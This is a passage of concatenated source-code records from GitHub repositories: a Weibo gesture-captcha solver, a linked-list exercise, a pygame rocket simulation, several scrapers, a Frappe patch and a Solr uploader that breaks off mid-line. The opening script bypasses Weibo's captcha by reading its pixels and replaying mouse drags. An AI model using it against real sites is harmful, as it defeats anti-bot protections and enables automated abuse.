'noline';\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n if datas[rows-1][0] == 0 or datas[rows-1][1] == 0:\r\n return '';\r\n else:\r\n max_zeros = 0;\r\n temp_zeros = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] == 0:\r\n temp_zeros += 1;\r\n if temp_zeros > max_zeros:\r\n max_zeros = temp_zeros;\r\n temp_zeros = 0;\r\n if max_zeros < 7:\r\n return '';\r\n else:\r\n maxlen = 6;\r\n print('31', datas);\r\n zero_array = [];\r\n times1 = 0;\r\n length = len(datas);\r\n for i in range(1,length+1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j;\r\n col = i-j-1;\r\n print('32', row, col, datas[row][col]);\r\n if datas[row][col] == 0:\r\n zero_cnt += 1;\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times1));\r\n print('-'*30, times1, 'end......');\r\n times = times1;\r\n times1 = 0;\r\n for i in range(length-1,0,-1):\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j + times1+ 1;\r\n col = (length-1) - j;\r\n print('32', row, col, datas[row][col]);\r\n if datas[row][col] == 0:\r\n zero_cnt += 1;\r\n times1 += 1;\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times+times1));\r\n print('-'*30, times+times1, 'end......');\r\n print('33',zero_array );\r\n max_of_firt_para = 0;\r\n max_of_second_para = 0;\r\n for i in range(len(zero_array)):\r\n if zero_array[i][0] >= max_of_firt_para:\r\n max_of_firt_para = zero_array[i][0];\r\n max_of_second_para = zero_array[i][1]; \r\n 
after_zeronum = zero_array[max_of_second_para][0];\r\n print('34', 'max_of_firt_para', max_of_firt_para, 'max_of_second_para', max_of_second_para, 'after_zeronum', after_zeronum);\r\n print('35', 'max_of_firt_para - after_zeronum', max_of_firt_para - after_zeronum);\r\n if max_of_firt_para - after_zeronum >= 3:\r\n return 'rb-lt';\r\n else:\r\n return 'lt-rb';\r\n elif type == 4:\r\n zerocnt = 0;\r\n for row in range(len(datas)):\r\n for col in range(len(datas[0])):\r\n if datas[row][col] == 0:\r\n zerocnt += 1;\r\n if zerocnt <= 10:\r\n return 'notline';\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n if datas[0][0] == 0 or datas[1][0] == 0:\r\n return '';\r\n else:\r\n max_zeros = 0;\r\n temp_zeros = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] == 0:\r\n temp_zeros += 1;\r\n if temp_zeros > max_zeros:\r\n max_zeros = temp_zeros;\r\n temp_zeros = 0;\r\n if max_zeros < 7:\r\n return '';\r\n else:\r\n maxlen = 6;\r\n print('41', datas);\r\n zero_array = [];\r\n times1 = 0;\r\n length = len(datas);\r\n for i in range(1,length+1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j;\r\n col = length-times1+j;\r\n print('42', row, col, datas[col][row]);\r\n if datas[col][row] == 0:\r\n zero_cnt += 1;\r\n print('-'*30, times1, 'end......');\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times1));\r\n times = times1;\r\n times1 = 0;\r\n for i in range(length-1,0,-1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = times1 + j;\r\n col = j;\r\n print('42', row, col, datas[col][row]);\r\n if datas[col][row] == 0:\r\n zero_cnt += 1;\r\n print('-'*30, times+times1, 'end......');\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times+times1));\r\n print('43', zero_array);\r\n\r\n max_of_firt_para = 0;\r\n max_of_second_para = 0;\r\n for i in range(len(zero_array)):\r\n if zero_array[i][0] > max_of_firt_para:\r\n max_of_firt_para = zero_array[i][0];\r\n max_of_second_para = zero_array[i][1];\r\n pre_zeronum = zero_array[max_of_second_para-2][0];\r\n print('44', 'max_of_firt_para', max_of_firt_para, 'max_of_second_para', max_of_second_para, 'pre_zeronum', pre_zeronum);\r\n print('45', 'max_of_firt_para - pre_zeronum', max_of_firt_para - pre_zeronum);\r\n if max_of_firt_para - pre_zeronum >= 3:\r\n return 'lb-rt';\r\n else:\r\n return 'rt-lb';\r\n else:\r\n pass;\r\n else:\r\n return '';\r\n \r\n def detect_direction_relation(self, directions):\r\n lines_relation = [];\r\n screenshot = self.get_screenshot();\r\n\r\n img = screenshot.crop((directions[0][0]-8, directions[0][1]-8, directions[0][0]+8, directions[0][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 1);\r\n if direction_str == 'l-r':\r\n lines_relation.append((1, 2));\r\n if direction_str == 'r-l':\r\n lines_relation.append((2, 1));\r\n \r\n img = screenshot.crop((directions[1][0]-8, directions[1][1]-8, directions[1][0]+8, directions[1][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 2);\r\n if direction_str == 't-b':\r\n lines_relation.append((2, 4));\r\n if direction_str == 'b-t':\r\n lines_relation.append((4, 2));\r\n \r\n img = screenshot.crop((directions[2][0]-8, directions[2][1]-8, directions[2][0]+8, directions[2][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n 
direction_str = self.determin_direction(datas, 1);\r\n if direction_str == 'l-r':\r\n lines_relation.append((3, 4));\r\n if direction_str == 'r-l':\r\n lines_relation.append((4, 3));\r\n \r\n img = screenshot.crop((directions[3][0]-8, directions[3][1]-8, directions[3][0]+8, directions[3][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 2);\r\n if direction_str == 't-b':\r\n lines_relation.append((1, 3));\r\n if direction_str == 'b-t':\r\n lines_relation.append((3, 1));\r\n \r\n ltrb = 0;\r\n img = screenshot.crop((directions[4][0]-8, directions[4][1]-8, directions[4][0]+8, directions[4][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'noline':\r\n ltrb=1;\r\n elif direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n elif direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n if ltrb == 0:\r\n img = screenshot.crop((directions[5][0]-8, directions[5][1]-8, directions[5][0]+8, directions[5][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n if direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n if ltrb == 0:\r\n img = screenshot.crop((directions[6][0]-8, directions[6][1]-8, directions[6][0]+8, directions[6][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n if direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n lbrt = 0;\r\n img = screenshot.crop((directions[7][0]-8, directions[7][1]-8, directions[7][0]+8, directions[7][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'noline':\r\n lbrt=1;\r\n elif direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n elif direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n if lbrt == 0:\r\n img = screenshot.crop((directions[8][0]-8, directions[8][1]-8, directions[8][0]+8, directions[8][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n if direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n if lbrt == 0:\r\n img = screenshot.crop((directions[9][0]-8, directions[9][1]-8, directions[9][0]+8, directions[9][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n if direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n return lines_relation;\r\n \r\n def get_lines_link(self, lines_relation):\r\n for item1 in 
lines_relation:\r\n            for item2 in lines_relation:\r\n                for item3 in lines_relation:\r\n                    if item1[1] == item2[0] and item2[1] == item3[0]:\r\n                        link_order = str(item1[0]) + str(item1[1]) + str(item2[1]) + str(item3[1]);\r\n                        link_order = [int(num) for num in list(link_order)];\r\n                        break;\r\n        return link_order;\r\n    \r\n    def move(self, link_order):\r\n        step = 30;\r\n        dx = dy = 0;\r\n        circles = self.browser.find_elements_by_css_selector('.patt-wrap .patt-circ');\r\n        for index in range(4):\r\n            circle = circles[link_order[index]-1];\r\n            if index == 0:\r\n                ActionChains(self.browser).move_to_element_with_offset(circle, circle.size['width']/2, circle.size['height']/2) \\\r\n                    .click_and_hold().perform();\r\n            else:\r\n                for i in range(step):\r\n                    ActionChains(self.browser).move_by_offset(dx/step, dy/step).perform();\r\n                    time.sleep(1/step);\r\n                if index == 3:\r\n                    ActionChains(self.browser).release().perform();\r\n                else:\r\n                    dx = circles[link_order[index+1]-1].location['x'] - circle.location['x'];\r\n                    dy = circles[link_order[index+1]-1].location['y'] - circle.location['y'];\r\n    \r\ndef main():\r\n    gg = weibogg();\r\n    gg.initpage();\r\n    directions = gg.get_directions_zb();\r\n    lines_relation = gg.detect_direction_relation(directions);\r\n    link_order = gg.get_lines_link(lines_relation);\r\n    print(link_order);\r\n    gg.move(link_order);\r\n\r\nif __name__ == '__main__':\r\n    main();\r\n","repo_name":"chen222246lei/webspider","sub_path":"gongge.py","file_name":"gongge.py","file_ext":"py","file_size_in_byte":21466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3936477438","text":"# https://leetcode-cn.com/problems/swap-nodes-in-pairs/\nfrom typing import List\n# Definition for singly-linked list.\n\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n\nclass Solution1:\n    # Method 1: recursion\n    # Time complexity: O(n), space complexity: O(n)\n    def swapPairs(self, head: ListNode) -> ListNode:\n        if not head or not head.next:\n            return head\n        newhead = head.next\n        head.next = self.swapPairs(newhead.next)\n        newhead.next = head\n        return newhead\n\n\nclass Solution:\n    # Method 2: iteration\n    # Time complexity: O(n), space complexity: O(1)\n    def swapPairs(self, head: ListNode) -> ListNode:\n        dummyHead = ListNode(0)\n        dummyHead.next = head\n        temp = dummyHead\n        while(temp.next and temp.next.next):\n            node1 = temp.next\n            node2 = temp.next.next\n            temp.next = node2\n            node1.next = node2.next\n            node2.next = node1\n            temp = node1\n        return dummyHead.next\n\n\ntest = ListNode()\nhead = test\nfor i in range(1, 5):\n    node = ListNode(i)\n    head.next = node\n    head = head.next\nS = Solution()\nnew_list = S.swapPairs(test)\nnewhead = new_list\nwhile(newhead):\n    print(newhead.val)\n    newhead = newhead.next\n","repo_name":"wenjiaaa/Leetcode","sub_path":"P0001_P0500/0024-swap-nodes-in-pairs.py","file_name":"0024-swap-nodes-in-pairs.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8342568138","text":"import pygame\nimport os\nimport math\n\n'''\n    up: vel=neg acc=neg\n    down: vel=pos acc=pos\n\n'''\n\n\n# window and refresh rate\nWIDTH, HEIGHT = 900, 1000\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\nFPS = 60\n#rocket initial position\nROCKET_X = 450\nROCKET_Y = 25\nROCKET_POS =(ROCKET_X, ROCKET_Y)\nROCKET_WIDTH = 50\nROCKET_HEIGHT = 90\n# rocket image \nROCKET_IMG = pygame.image.load(os.path.join('assets', 'rocket.png'))\nROCKET = pygame.transform.scale(ROCKET_IMG, (ROCKET_WIDTH, ROCKET_HEIGHT))\n#window 
background\nbackground = ('#9dedbf')\n\n\nclass Rocket:\n    def __init__(self, rocket_img, pos, width, height):\n        self.img = rocket_img\n        self.pos = pos\n        self.x = pos[0]\n        self.y = pos[1]\n        self.width = width\n        self.height = height\n        self.rocket_rect = pygame.Rect(self.x, self.y, self.width, self.height)\n        self.mass = float(3000)\n        self.angle = float(90)\n        self.com = (self.width/2, self.height/1.5)\n        self.omega = float(0)\n        self.v_y = float(0)\n        self.v_x = float(0)\n        self.thrust = float(30000)\n        self.thrust_angle = float(math.radians(self.angle)+math.radians(0))\n        self.rapid_unscheduled_disassembly = False\n\n\n    def position(self, time):\n        self.v_y = ((-self.thrust/self.mass * math.cos(self.thrust_angle)) + 9.8) * time\n        self.v_x = (-self.thrust/self.mass*math.sin(self.thrust_angle)) * time\n        self.x += self.v_x * time + (1/2) * ((-self.thrust/self.mass) * math.sin(self.thrust_angle)) * time**2\n        self.y += (self.v_y * time + (1/2) * ((-self.thrust/self.mass) * math.cos(self.thrust_angle) + 9.8) * time**2)\n        return self.x, self.y\n\n    def angle_pos(self, time):\n        # solid cylinder: mr^2/2\n        inertia = (self.mass * (self.width/2)**2)/2 \n        d = self.height - self.com[1]\n        torque = -(d * self.thrust * math.sin(self.thrust_angle))\n        alpha = torque/inertia\n        self.omega += alpha * time\n        return None\n\ndef draw_window(rocket, time):\n    pos_x, pos_y = rocket.position(time)\n#    print(f\"v_x: {rocket.v_x}, v_y: {rocket.v_y}\")\n#    print(f\"x: {pos_x}, y: {pos_y}\")\n    WIN.fill(background)\n    WIN.blit(pygame.transform.rotate(rocket.img, rocket.angle), (pos_x, pos_y))\n    pygame.draw.circle(rocket.img, (255, 0, 0), (rocket.com[0], rocket.com[1]), 4)\n#    print(f\"com: {pos_x+rocket.com[0], pos_y+rocket.com[1]}\")\n    pygame.display.update()\n\n\ndef main():\n\n    pygame.display.set_caption(\"LandAI\")\n\n    rocket = Rocket(ROCKET, ROCKET_POS, ROCKET_WIDTH, ROCKET_HEIGHT)\n\n    clock = pygame.time.Clock()\n\n    run = not rocket.rapid_unscheduled_disassembly\n\n    while run:\n        clock.tick(FPS)\n        time = float(pygame.time.get_ticks()/1000)\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                run = False \n\n        draw_window(rocket, time)\n\n    pygame.quit()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"notsoharshdevisha/TVC-AI-Lander","sub_path":"mygame.py","file_name":"mygame.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30355655903","text":"import requests\nimport os\nimport time\n\nfrom get_conf import GetConf\nfrom sanddroid_db import SanddroidMysqlClient\n\n\n# APK analysis record lookup\nclass Sanddroid:\n    def __init__(self, conf):\n        self.conf = conf\n        self.mysql_client = SanddroidMysqlClient(conf)\n        self.url = 'http://sanddroid.xjtu.edu.cn/apk_table_info'\n\n        self.headers = {\n            'Referer': 'http://sanddroid.xjtu.edu.cn/',\n            'Host': 'sanddroid.xjtu.edu.cn',\n            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n        }\n\n    def parse_data(self, md5, json_data):\n        indate = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(json_data[0])))\n        package_name = json_data[2]\n        result = 'No virus found' if json_data[3] == 'UnDetected' else json_data[3]\n        score = json_data[4]\n        self.mysql_client.insert_sanddroid((md5, package_name, result, score, indate, ))\n\n    def get_json_data(self, md5):\n        if self.mysql_client.select_sanddroid((md5,)):\n            with open('log/info.txt', 'a') as f_info:\n                txt = md5 + ':record already exists, skipping crawl!\\n'\n                f_info.write(txt)\n            return None\n        form_data = {\n            
'sEcho': '15',\n            'iColumns': '5',\n            'sColumns': '',\n            'iDisplayStart': '0',\n            'iDisplayLength': '50',\n            'mDataProp_0': '0',\n            'mDataProp_1': '1',\n            'mDataProp_2': '2',\n            'mDataProp_3': '3',\n            'mDataProp_4': '4',\n            'iSortCol_0': '1',\n            'sSortDir_0': 'asc',\n            'iSortingCols': '1',\n            'bSortable_0': 'true',\n            'bSortable_1': 'true',\n            'bSortable_2': 'true',\n            'bSortable_3': 'true',\n            'bSortable_4': 'true',\n            'is_search': 'true',\n            'apk_md5': md5,\n            'cert_sha1': '',\n            'package': '',\n            'malware_name': '',\n        }\n        json_data = requests.post(self.url, headers=self.headers, data=form_data).json()\n        if not json_data['aaData']:\n            with open('log/err.txt', 'a') as f_err:\n                txt = md5 + ':apk has no analysis record yet!\\n'\n                f_err.write(txt)\n            return None\n\n        return json_data\n\n    def spider(self):\n        print('Starting crawl of http://sanddroid.xjtu.edu.cn ...')\n        if not os.path.exists('log'):\n            os.mkdir('log')\n        md5 = ''\n        while True:\n            try:\n                md5 = self.mysql_client.select_apk_black_list_info((2,))[0][0]\n                if not md5:\n                    break\n                print(md5)\n                time.sleep(2)\n                json_data = self.get_json_data(md5)['aaData']\n                if json_data:\n                    self.parse_data(md5, json_data[0])\n                    with open('log/result.txt', 'a') as f_result:\n                        txt = md5 + ':query finished!\\n'\n                        f_result.write(txt)\n                self.mysql_client.update_apk_black_list((md5, 2,))\n            except Exception as err:\n                with open('log/err.txt', 'a') as f_err:\n                    txt = md5 + ' ' + str(err) + '\\n'\n                    f_err.write(txt)\n                self.mysql_client.update_apk_black_list((md5, 2))\n\n        print('Crawl of http://sanddroid.xjtu.edu.cn finished!')\n\n\ndef main():\n    conf = GetConf('conf.xml')\n    sanddroid = Sanddroid(conf)\n    sanddroid.spider()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"smallmeet/fangzhen","sub_path":"sanddroid/sanddroid-bak.py","file_name":"sanddroid-bak.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21521316614","text":"import frappe\nfrom frappe.permissions import add_user_permission, clear_user_permissions_for_doctype\nfrom pypika.functions import Length\n\nfrom landa.organization_management.doctype.member_function.member_function import (\n\tapply_active_member_functions,\n)\n\n\ndef execute():\n\ttable = frappe.qb.DocType(\"LANDA Member\")\n\tfor member_name, user, organization in (\n\t\tfrappe.qb.from_(table)\n\t\t.select(table.name, table.user, table.organization)\n\t\t.where(Length(table.organization) > 7)\n\t\t.where(table.user.notnull())\n\t\t.where(table.user != \"\")\n\t\t.run()\n\t):\n\t\tclear_user_permissions_for_doctype(\"Organization\", user)\n\t\tadd_user_permission(\"Organization\", organization, user, ignore_permissions=True)\n\t\tapply_active_member_functions({\"member\": member_name})\n","repo_name":"alyf-de/landa","sub_path":"landa/patches/restrict_members_to_local_group.py","file_name":"restrict_members_to_local_group.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"15484359519","text":"import numpy as np\nfrom scipy.stats import norm\n\n# It is known that the heights of the footballers in the national team are normally distributed\n# with a population variance equal to 25 sq. cm. The sample size is 27,\n# the sample mean is 174.2. Find the confidence interval for the expected\n# value with a confidence level of 0.95.\n\nM = 174.2\nstd = np.sqrt(25)\nn = 27\n# We use the Z table, since 
sigma can be computed from the given variance\n# a = 97.5% (2.5 + 95%)\nZ = norm.ppf(0.975)\n\nconfidence_interval_a = M - Z * (std / np.sqrt(n))\nconfidence_interval_b = M + Z * (std / np.sqrt(n))\n# Answer: (172.31;176.08)\n","repo_name":"asemeniuc23/machine_learning_study","sub_path":"MatStat/homework_6/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25416194602","text":"import network \nstation = network.WLAN(network.STA_IF) # client, not AP\n\naddress = ''\ndef connect():\n    import config_esp32\n    global address\n\n    config = config_esp32.read_config()\n    essid = config['essid']\n    psk = str(config['psk'])\n    address = config['address']\n\n    print('wifi connecting to', essid)\n    station.active(False)\n    station.active(True) # enable wifi\n    if psk:\n        print('connect to', essid, psk)\n        station.connect(essid, psk)\n    else:\n        station.connect(essid)\n\nimport time\nconnected = False, time.time()\nconnect()\n\ndef poll(client):\n    global connected\n    isconnected = station.isconnected()\n    if connected[0] == isconnected: # no change\n        if not isconnected and time.time() - connected[1] > 8:\n            print('wifi timeout, reconnecting wifi', time.time() - connected[1])\n            connect()\n            connected = isconnected, time.time()\n        return isconnected\n    connected = isconnected, time.time()\n    if connected:\n        if address:\n            host = address\n        else:\n            addrs = station.ifconfig()\n            print('wifi connection success', addrs)\n            host = addrs[3]\n\n        if client.host != host:\n            print('wifi connecting to pypilot at', host)\n            client.disconnect()\n            client.host = host\n    else: # disconnected\n        print('wifi disconnected')\n        client.disconnect()\n    return connected\n","repo_name":"FredericGuilbault/pypilot","sub_path":"hat/wifi_esp32.py","file_name":"wifi_esp32.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"43445376217","text":"import json\nimport sys\nimport time\n\nimport requests\n\nsession = requests.Session()\nsession.headers[\n    \"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\"\n\n\ndef provide() -> dict:\n    page = 1\n    global session\n    r = session.get(\"https://www.bilibili.com/\")\n\n    if \"debug\" in sys.argv:\n        print(r.status_code)\n        print(session.cookies.get_dict())\n\n    while True:\n        data = {\n            \"search_type\": \"video\",\n            \"keyword\": \"同步至节奏医生视频合集\" if \"debug\" not in sys.argv else \"节奏医生\",\n            \"order\": \"pubdate\",\n            \"tids\": 4,\n            \"page\": page,\n        }\n        page += 1\n\n        result = session.get(\"https://api.bilibili.com/x/web-interface/search/type\", params=data).json()\n        if result[\"code\"] != 0:\n            raise ValueError(f\"Result code {result['code']}: {result['message']}\")\n\n        for item in result[\"data\"][\"result\"]:\n            yield item\n\n\ndef load_existed_authors() -> set:\n    try:\n        file_name = \"../docs/authors.txt\" if \"debug\" not in sys.argv else \"debug_authors.txt\"\n        authors = set()\n        with open(file_name, \"rt\", encoding=\"utf-8\") as f:\n            for line in f.read().splitlines():\n                if len(line) <= 0 or line.isspace() or line.startswith(\"#\"):\n                    continue\n\n                authors.add(int(line.split('|')[1]))\n        return authors\n    except FileNotFoundError:\n        return set()\n\n\ndef load_config() -> dict:\n    try:\n        with open(\"config.json\", \"rt\", encoding=\"utf-8\") as f:\n            return json.load(f)\n    except FileNotFoundError:\n        return {\n            
\"timestamp\": int(time.time()) - 60 * 60 * 24,\n }\n\n\ndef save_config(config: dict):\n with open(\"config.json\", \"wt\", encoding=\"utf-8\") as f:\n json.dump(config, f)\n\n\nif __name__ == '__main__':\n authors_existed = load_existed_authors()\n config = load_config()\n\n author_file_name = \"../docs/authors.txt\" if \"debug\" not in sys.argv else \"debug_authors.txt\"\n video_file_name = \"../docs/videos.txt\" if \"debug\" not in sys.argv else \"debug_videos.txt\"\n with open(author_file_name, \"at\", encoding=\"utf-8\") as author_file, open(video_file_name, \"at\",\n encoding=\"utf-8\") as video_file:\n for video in provide():\n if video[\"senddate\"] < config[\"timestamp\"]:\n break\n\n if \"tag\" not in video[\"hit_columns\"]:\n continue\n\n author_id = video[\"mid\"]\n if author_id not in authors_existed:\n author_name = video[\"author\"].replace(\"|\", \"·\")\n print(f\"Found new author {author_name} with id {author_id}.\")\n author_file.write(f\"{author_name}|{author_id}\\n\")\n authors_existed.add(author_id)\n\n bvid = video[\"bvid\"]\n video_name = video[\"title\"].replace(\"\", \"\").replace(\"\", \"\").replace(\"|\", \"·\")\n\n print(f\"Found new video {video_name} with bvid {bvid} and author {author_id}.\")\n video_file.write(f\"{author_id}|{bvid}|{video_name}\\n\")\n\n if \"debug\" not in sys.argv:\n config[\"timestamp\"] = int(time.time())\n save_config(config)\n","repo_name":"RDCN-Community-Developers/bv.rdlevel.cn","sub_path":"updater/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29937619231","text":"import time\nimport sys\n\ndef factorial(n):\n response = 1\n\n while n > 1:\n response *= n\n n -= 1\n\n return response\n\ndef factorial_recursive(n):\n if n == 1:\n return 1\n\n return n * factorial_recursive(n - 1)\n\n\nif __name__ == '__main__':\n n = 2500\n sys.setrecursionlimit(n + 10)\n\n starting_time = time.time()\n factorial(n)\n end_time = time.time()\n print(f\"Execution time with bucle\\t{end_time - starting_time}\")\n\n startin_time = time.time()\n factorial_recursive(n)\n end_time = time.time()\n print(f\"Execution time with recusive\\t{end_time - starting_time}\")","repo_name":"AlbertoNM/poo_algorithms_py","sub_path":"complejidad_algoritmica/complejidad_algoritmica.py","file_name":"complejidad_algoritmica.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42388725475","text":"from solr.instances import get_session\nfrom multiprocessing import Pool, cpu_count\nimport itertools\nimport json\nfrom datetime import datetime\nfrom data import batch_jsonl_parsed, do_parallel\nimport re\nfrom data.dblp.stream_update import generate_events\nfrom data.dblp.convert_to_jsonl import build_upload_document, yield_from_gzip\nfrom pprint import pprint\nfrom solr_config import COLLECTION_DEFAULTS\nfrom solr.configsets import get_config\n\nnew_names = {\n 'pub_type': 'doc_type',\n}\ncount_fields = ['author']\nconvert_to_list = ['author', 'ee']\ndoi_re = re.compile(r'.*/(10.[0-9]+(\\.[0-9]+)?/.*)')\n\n\ndef as_list(parsed, name):\n if name not in parsed:\n return\n if type(parsed[name]) is list:\n return\n l = parsed.pop(name)\n parsed[name] = [l]\n\n\ndef rename(dic, old, new):\n try:\n dic[new] = dic.pop(old)\n except KeyError:\n pass\n\n\ndef find_doi(inp):\n for url in inp:\n if 'doi' not in url:\n continue\n match = 
doi_re.match(url)\n if not match:\n continue\n groups = match.groups()\n if 0 < len(groups):\n return groups[0]\n return None\n\n\ndef parse_json(line):\n try:\n parsed = json.loads(line)\n except json.decoder.JSONDecodeError as e:\n raise Exception(f'line: {line}')\n # parsed = line\n # dblp-2019-02-01.xml.gz contains one set with a duplicate year field\n # this will replace the list with the first value\n try:\n if isinstance(parsed['year'], list):\n parsed['year'] = parsed['year'][0]\n except KeyError:\n pass\n for old, new in new_names.items():\n rename(parsed, old, new)\n for field in convert_to_list:\n as_list(parsed, field)\n for field in count_fields:\n parsed[f'{field}_count'] = len(parsed.get(field, []))\n doi = find_doi(parsed.get('ee', []))\n if doi is not None:\n parsed['doi'] = doi\n\n # for url in parsed.get('ee', []):\n # u = urlparse(url)\n # if not u or not u.hostname:\n # continue\n # if u.hostname.endswith('doi.org'):\n # parsed['doi'] = u.path[1:]\n # break\n # elif u.hostname == 'doi.ieeecomputersociety.org':\n # parsed['doi'] = u.path[1:]\n # break\n\n # if parsed['key'] == 'series/ais/LimbasiyaA18':\n # interact('no doi?', local=locals())\n\n parsed['id'] = parsed.pop('key')\n return json.dumps(parsed)\n\n\ndef batch_jsonl(generator, batchsize):\n \"\"\"\n creates larger chunks from a genenerator function.\n\n :param generator: the generator function that yields lines of json\n :param batchsize: the maximum size of the batch\n :return: yields utf-8 encoded bytes\n \"\"\"\n with Pool(processes=cpu_count()) as pool:\n while True:\n batch = itertools.islice(generator, batchsize)\n batch = '\\n'.join(pool.imap(parse_json, batch))\n if 0 < len(batch):\n yield batch.encode('utf-8')\n else:\n break\n\n\ndef upload_parallel(generator, collection):\n with Pool(processes=cpu_count()) as pool:\n yield from pool.imap(collection.update.jsonl, generator)\n\n\ndef maybe_add_field(c, name: str, typ: str):\n response = c.schema.fields.get_single(name)\n if 200 != response.status_code:\n print(f'adding field {name}: {typ}:')\n print(c.schema.fields.add(name, typ).json())\n else:\n print(f'field {name} exists, skipping')\n\n\ndef main():\n alias = 'dblp'\n config_local = 'dblp'\n config_online = 'dblp'\n version = '2019-07-01'\n collection_name = '.'.join([alias, version])\n s = get_session('localhost', port=8984)\n collections = s.admin.collections.list().json()['collections']\n create = False\n if collection_name in collections:\n decide = input(f'collection {collection_name} exists, reset? 
